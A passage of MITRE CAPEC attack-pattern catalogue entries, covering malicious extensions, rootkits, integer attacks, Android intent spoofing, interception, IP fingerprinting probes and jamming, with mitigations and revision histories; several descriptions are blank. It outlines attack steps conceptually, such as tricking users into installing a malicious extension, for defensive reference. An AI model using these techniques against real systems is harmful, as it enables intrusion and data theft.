The target must accept user data for processing and the manner in which this data is processed must depend on some aspect of the format or flags that the attacker can control.

Resources Required

None: No specialized resources are required to execute this type of attack.

Related Weaknesses

CWE-ID	Weakness Name
20	Improper Input Validation

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-698: Install Malicious Extension

Attack Pattern ID: 698

Abstraction: Detailed

View customized information:

Description

An adversary directly installs or tricks a user into installing a malicious extension into existing trusted software, with the goal of achieving a variety of negative technical impacts.

Extended Description

Many software applications allow users to install third-party software extensions/plugins that provide additional features and functionality. Adversaries can take advantage of this behavior to install malware on a system with relative ease. This may require the adversary compromising a system and then installing the malicious extension themself. An alternate approach entails masquerading the malicious extension as a legitimate extension. The adversary then convinces users to install the malicious component, via means such as social engineering, or simply waits for victims to unknowingly install the malware on their systems. Once the malicious extension has been installed, the adversary can achieve a variety of negative technical impacts such as obtaining sensitive information, executing unauthorized commands, observing/modifying network traffic, and more.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	542	Targeted Malware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Identify target(s): The adversary must first identify target software that allows for extensions/plugins and which they wish to exploit, such as a web browser or desktop application. To increase the attack space, this will often be popular software with a large user-base.

Experiment

Create malicious extension: Having identified a suitable target, the adversary crafts a malicious extension/plugin that can be installed by the underlying target software. This malware may be targeted to execute on specific operating systems or be operating system agnostic.

Exploit

Install malicious extension: The malicious extension/plugin is installed by the underlying target software and executes the adversary-created malware, resulting in a variety of negative technical impacts.

Techniques
Adversary-Installed: Having already compromised the target system, the adversary simply installs the malicious extension/plugin themself.
User-Installed: The adversary tricks the user into installing the malicious extension/plugin, via means such as social engineering, or may upload the malware on a reputable extension/plugin hosting site and wait for unknowing victims to install the malicious component.

Prerequisites

The adversary must craft malware based on the type of software and system(s) they intend to exploit.

If the adversary intends to install the malicious extension themself, they must first compromise the target machine via some other means.

Skills Required

[Level: Medium]

Ability to create malicious extensions that can exploit specific software applications and systems.

[Level: Medium]

Optional: Ability to exploit target system(s) via other means in order to gain entry.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control	Read Data
Integrity Access Control	Modify Data
Authorization Access Control	Execute Unauthorized Commands Alter Execution Logic Gain Privileges

Mitigations

Only install extensions/plugins from official/verifiable sources.

Confirm extensions/plugins are legitimate and not malware masquerading as a legitimate extension/plugin.

Ensure the underlying software leveraging the extension/plugin (including operating systems) is up-to-date.

Implement an extension/plugin allow list, based on the given security policy.

If applicable, confirm extensions/plugins are properly signed by the official developers.

For web browsers, close sessions when finished to prevent malicious extensions/plugins from executing the the background.

Example Instances

In January 2018, Palo Alto's Unit 42 reported that a malicious Internet Information Services (IIS) extension they named RGDoor was used to create a backdoor into several Middle Eastern government organizations, as well as a financial institution and an educational institution. This malware was used in conjunction with the TwoFace webshell and allowed the adversaries to upload/download files and execute unauthorized commands. [REF-740]

In December 2018, it was reported that North Korea-based APT Kimusky (also known as Velvet Chollima) infected numerous legitimate academic organizations within the U.S., many specializing in biomedical engineering, with a malicious Google Chrome extension. Dubbed "Operation STOLEN PENCIL", the attack entailed conducting spear-phishing attacks to trick victims into installing a malicious PDF reader named "Auto Font Manager". Once installed, the malware allowed adversaries to steal cookies and site passwords, as well as forward emails from some compromised accounts. [REF-741]

Related Weaknesses

CWE-ID	Weakness Name
507	Trojan Horse
829	Inclusion of Functionality from Untrusted Control Sphere

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1176	Browser Extensions
1505.004	Server Software Component: IIS Components

References

[REF-740] Robert Falcone. "OilRig uses RGDoor IIS Backdoor on Targets in the Middle East". Palo Alto Networks. 2018-01-25. <https://unit42.paloaltonetworks.com/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/>. URL validated: 2022-09-23.

[REF-741] ASERT Team. "STOLEN PENCIL Campaign Targets Academia". NETSCOUT. 2018-12-05. <https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>. URL validated: 2022-09-23.

Content History

Submissions
Submission Date	Submitter	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)

CAPEC-550: Install New Service

Attack Pattern ID: 550

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	542	Targeted Malware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Mitigations

Limit privileges of user accounts so new service creation can only be performed by authorized administrators.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1543	Create or Modify System Process

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated References
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-552: Install Rootkit

Attack Pattern ID: 552

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	542	Targeted Malware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Mitigations

Prevent adversary access to privileged accounts necessary to install rootkits.

Example Instances

A rootkit may take the form of a hypervisor. A hypervisor is a software layer that sits between the operating system and the processor. It presents a virtual running environment to the operating system. An example of a common hypervisor is Xen. Because a hypervisor operates at a level below the operating system it can hide its existence from the operating system.

Similar to a rootkit, a bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1014	Rootkit
1542.003	Pre-OS Boot:Bootkit
1547.006	Boot or Logon Autostart Execution:Kernel Modules and Extensions

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary, Examples-Instances, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses, Taxonomy_Mappings
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings

CAPEC-128: Integer Attacks

Attack Pattern ID: 128

Abstraction: Standard

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	153	Input Data Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	92	Forced Integer Overflow

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Prerequisites

The target application must have an integer variable for which only some of the possible integer values are expected by the application and where there are no checks on the value of the variable before use.

The attacker must be able to manipulate the targeted integer variable such that normal operations result in non-standard values due to the storage structure of integers.

Resources Required

None: No specialized resources are required to execute this type of attack.

Related Weaknesses

CWE-ID	Weakness Name
682	Incorrect Calculation

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required

CAPEC-502: Intent Spoof

Attack Pattern ID: 502

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	148	Content Spoofing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application will be used to issue spoofed intents.

Mitigations

To limit one's exposure to this type of attack, developers should avoid exporting components unless the component is specifically designed to handle requests from untrusted applications. Developers should be aware that declaring an intent filter will automatically export the component, exposing it to public access. Critical, state-changing actions should not be placed in exported components. If a single component handles both inter- and intra-application requests, the developer should consider dividing that component into separate components. If a component must be exported (e.g., to receive system broadcasts), then the component should dynamically check the caller's identity prior to performing any operations. Requiring Signature or SignatureOrSystem permissions is an effective way of limiting a component's exposure to a set of trusted applications. Finally, the return values of exported components can also leak private data, so developers should check the caller's identity prior to returning sensitive values.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-427] Erika Chin, Adrienne Porter Felt, Kate Greenwood and David Wagner. "Analyzing Inter-Application Communication in Android". International Conference on Mobile Systems, Applications, and Services (MobiSys). 2011. <https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns, Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Description

CAPEC-276: Inter-component Protocol Manipulation

Attack Pattern ID: 276

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	272	Protocol Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	665	Exploitation of Thunderbolt Protection Flaws

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Related Weaknesses

CWE-ID	Weakness Name
707	Improper Neutralization

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description, Description Summary, Related_Weaknesses

CAPEC-117: Interception

Attack Pattern ID: 117

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	157	Sniffing Attacks
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	499	Android Intent Intercept
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	651	Eavesdropping

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The target must transmit data over a medium that is accessible to the adversary.

Resources Required

The adversary must have the necessary technology to intercept information passing between the nodes of a network. For TCP/IP, the capability to run tcpdump, ethereal, etc. can be useful. Depending upon the data being targeted the technological requirements will change.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Leverage encryption to encode the transmission of data thus making it accessible only to authorized parties.

Related Weaknesses

CWE-ID	Weakness Name
319	Cleartext Transmission of Sensitive Information

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Prerequisites, Description Summary, Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Description, Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Description

CAPEC-113: Interface Manipulation

Attack Pattern ID: 113

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	36	Using Unpublished Interfaces or Functionality
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	121	Exploit Non-Production Interfaces
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	133	Try All Common Switches
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	160	Exploit Script-Based APIs

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

The target system must expose interface functionality in a manner that can be discovered and manipulated by an adversary. This may require reverse engineering the interface or decrypting/de-obfuscating client-server exchanges.

Resources Required

The requirements vary depending upon the nature of the interface. For example, application-layer APIs related to the processing of the HTTP protocol may require one or more of the following: an Adversary-In-The-Middle (CAPEC-94) proxy, a web browser, or a programming/scripting language.

Example Instances

An adversary may make a request to an application that leverages a non-standard API that is known to incorrectly validate its data and thus it may be manipulated by supplying metacharacters or alternate encodings as input, resulting in any number of injection flaws, including SQL injection, cross-site scripting, or command execution.

API methods not intended for production, such as debugging or testing APIs, may not be disabled when deploying in a production environment. As a result, dangerous functionality can be exposed within the production environment, which an adversary can leverage to execute additional attacks.

SoC components contain insufficient identifiers, which allows an adversary to reset the device at will or read sensitive data from the device.

Related Weaknesses

CWE-ID	Weakness Name
1192	System-on-Chip (SoC) Using Components without Unique, Immutable Identifiers

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Attack_Prerequisites, Description Summary, Related_Attack_Patterns
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Activation_Zone, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Typical_Likelihood_of_Exploit
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Name, @Status, Description, Example_Instances, Prerequisites, Related_Weaknesses, Resources_Required
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses, Resources_Required
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	API Abuse/Misuse

2020-12-17 (Version 3.4)	API Manipulation

CAPEC-318: IP 'ID' Echoed Byte-Order Probe

Attack Pattern ID: 318

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Related_Weaknesses

CAPEC-319: IP (DF) 'Don't Fragment Bit' Echoing Probe

Attack Pattern ID: 319

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Related_Weaknesses

CAPEC-590: IP Address Blocking

Attack Pattern ID: 590

Abstraction: Detailed

View customized information:

Description

An adversary performing this type of attack drops packets destined for a target IP address. The aim is to prevent access to the service hosted at the target IP address.

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	603	Blockage

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Manipulate System Resources

Prerequisites

This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection.

Consequences

Scope	Impact	Likelihood
Availability	Other

Mitigations

Have a large pool of backup IPs built into the application and support proxy capability in the application.

Example Instances

Consider situations of information censorship for political purposes, where regimes that prevent access to specific web services.

Related Weaknesses

CWE-ID	Weakness Name
300	Channel Accessible by Non-Endpoint

References

[REF-475] Abdelberi Chaabane, Terence Chen, Mathieu Cunche, Emiliano De Cristofaro, Arik Friedman and Mohamed Ali Kaafar. "Censorship in the Wild: Analyzing Internet Filtering in Syria". IMC 2014. 2014-02.

Content History

Submissions
Submission Date	Submitter	Organization
2017-01-12 (Version 2.9)	Seamus Tuohy
2017-01-12 (Version 2.9)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Related_Vulnerabilities
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns, Related_Weaknesses

CAPEC-317: IP ID Sequencing Probe

Attack Pattern ID: 317

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description, Description Summary, References, Related_Weaknesses

CAPEC-601: Jamming

Attack Pattern ID: 601

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	607	Obstruction
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	559	Orbital Jamming
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	604	Wi-Fi Jamming
